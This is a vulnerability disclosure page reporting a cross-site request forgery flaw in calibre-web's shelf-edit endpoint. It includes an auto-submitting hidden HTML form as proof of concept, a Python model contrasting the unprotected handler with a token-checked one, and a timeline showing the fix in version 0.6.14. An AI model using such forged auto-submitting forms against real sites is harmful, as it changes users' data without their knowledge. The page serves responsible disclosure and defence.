Cross-Site Request Forgery (CSRF) in janeczku/calibre-web

Valid

Reported on

Sep 25th 2021


Description

CSRF bug to change a shelf from private to public

Proof of Concept

The request below is vulnerable to a CSRF attack

<form action="http://localhost:8083/shelf/edit/2" method="post" id="myForm2">
<input type="hidden" name="is_public" value="on">
<input type="hidden" name="title" value="asdad">
<input type="submit" value="Submit" id="test">
</form> 
<script>
document.getElementById("test").click();
</script>

Impact

CSRF bug to change anyone's shelf status from private to public
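The following is an added example, not code from the report or from calibre-web and not the project's actual fix: a standard-library model of the shelf-edit handler showing why the form's POST succeeds on the session cookie alone and how a per-session synchronizer token rejects it. The in-memory session and shelf stores, the function names and the `csrf_token` field name are assumptions made for illustration.

```python
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed in-memory state standing in for a session store and a shelf table.
SESSIONS = {}  # session id -> CSRF token (hypothetical layout)
SHELVES = {2: {"title": "private shelf", "is_public": False}}


def login():
    """Create a session and the token the site embeds in its own forms."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = secrets.token_urlsafe(32)
    return sid, SESSIONS[sid]


def edit_shelf(shelf_id, session_id, body, check_csrf=True):
    """Model of POST /shelf/edit/<id>; returns an HTTP-style status code."""
    expected = SESSIONS.get(session_id)
    if expected is None:
        return 401  # no valid session cookie
    form = {k: v[0] for k, v in parse_qs(body).items()}
    if check_csrf:
        supplied = form.get("csrf_token", "")
        # The browser attaches the cookie to a cross-site POST automatically,
        # but the other origin cannot read the token, so this check fails.
        if not hmac.compare_digest(supplied.encode(), expected.encode()):
            return 403
    shelf = SHELVES[shelf_id]
    shelf["title"] = form.get("title", shelf["title"])
    shelf["is_public"] = form.get("is_public") == "on"
    return 200


def demo():
    sid, token = login()
    forged = "is_public=on&title=asdad"  # the two fields from the report's form
    results = {"unprotected": edit_shelf(2, sid, forged, check_csrf=False)}
    SHELVES[2].update(title="private shelf", is_public=False)  # reset state
    results["protected_forged"] = edit_shelf(2, sid, forged)
    results["still_private"] = not SHELVES[2]["is_public"]
    results["protected_legit"] = edit_shelf(2, sid, forged + "&csrf_token=" + token)
    return results


if __name__ == "__main__":
    print(demo())
```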

We have contacted a member of the janeczku/calibre-web team and are waiting to hear back 2 years ago
janeczku validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
janeczku marked this as fixed in 0.6.14 with commit 50919d 4 months ago
The fix bounty has been dropped
This vulnerability has now been published 4 months ago